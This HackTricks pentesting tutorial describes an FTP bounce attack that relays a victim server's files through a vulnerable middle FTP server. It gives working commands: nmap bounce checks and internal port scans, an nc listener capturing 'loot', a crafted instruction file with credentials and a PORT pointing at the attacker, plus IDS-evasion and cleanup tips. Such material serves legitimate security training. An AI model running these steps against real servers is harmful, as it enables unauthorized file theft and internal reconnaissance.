FTP Bounce Download 2 of FTP File

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Resume

If you have access to a bounce FTP server, you can make it request files of another FTP server (where you know some credentials) and download that file to your own server.

Requirements

• FTP valid credentials in the FTP Middle server
• FTP valid credentials in Victim FTP server
• Both servers accept the PORT command (bounce FTP attack)
• You can write inside some directory of the FTP Middle server
• The middle server has more access inside the Victim FTP Server than you

Steps

1. Connect to your own FTP server and make the connection passive (pasv command) so it listens in a directory where the victim service will send the file.
2. Craft the file the FTP Middle server will send to the Victim server (the exploit script). This file will be plain text with the needed commands to authenticate against the Victim server, change the directory and download a file to your own server.
3. Connect to the FTP Middle Server and upload the previous file.
4. Make the FTP Middle server establish a connection with the Victim server and send the exploit file.
5. Capture the file in your own FTP server.
6. Delete the exploit file from the FTP Middle server.

Quick check for vulnerable bounce hosts

• Nmap still supports FTP bounce checks. Example to verify a potential middle server:

nmap -Pn -p21 --script ftp-bounce <middle_ftp_ip>
# or directly attempt a bounce scan
nmap -Pn -p80 -b user:pass@<middle_ftp_ip>:21 <internal_target_ip>

If the server refuses third‑party PORT values the scan will fail; some embedded/legacy printers, NAS and appliance FTP daemons still allow it.

Automating the 2nd FTP download

Below is a modernized way to pull a file through a vulnerable middle FTP server.

1. Open a passive listener on your attack box (any TCP sink works):

   nc -lvnp 2121 > loot.bin  # or run a small pyftpdlib server
   

2. Note your IP as A,B,C,D and port P as p1,p2 (p1 = P/256, p2 = P%256).

3. Build the instruction file that the middle server will replay to the victim:

   cat > instrs <<'EOF'
   USER <victim_user>
   PASS <victim_pass>
   CWD /path/inside/victim
   TYPE I
   PORT A,B,C,D,p1,p2
   RETR secret.tar.gz
   QUIT
   EOF
   # Add padding so the control channel stays open on picky daemons
   dd if=/dev/zero bs=1024 count=60 >> instrs
   

4. Upload & trigger from the middle server (classic proxy FTP):

   ftp -n <middle_ftp> <<'EOF'
   user <middle_user> <middle_pass>
   put instrs
   PORT <victim_ip_with_commas>,0,21
   RETR instrs
   QUIT
   EOF
   

5. Grab the file from your listener (loot.bin).

6. Clean up the uploaded instrs file on the middle server.

Notes:

• Padding (dd ...) prevents the control connection from closing before the RETR finishes (large TCP window issue discussed in classic writeups).
• Any service that can listen and dump TCP can replace the FTP PASV socket (e.g., socat -u TCP-LISTEN:2121,fork - > loot.bin).
• If the middle server restricts privileged ports, use a high port in PORT and adjust your listener accordingly.

Extra tricks

• Use a bounceable FTP server to port-scan internal hosts when file relay is blocked:

  nmap -Pn -p22,80,445 -b anonymous:<email>@<middle_ftp> <internal_ip>
  

• Some modern WAF/IDS (e.g., Juniper IPS) ship signatures specifically for FTP:EXPLOIT:BOUNCE-ATTACK; noisy payloads or missing padding may trip them.
• When the middle server enforces “PORT to same host” restrictions, place your listener on the middle server itself (if you have write/execute) and forward the captured file later.

For a more detailed old-school walkthrough check: http://www.ouah.org/ftpbounce.html

References

• Nmap book – TCP FTP Bounce Scan (-b)
• CPTS Attacking Common Services – FTP Bounce example (2025)

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.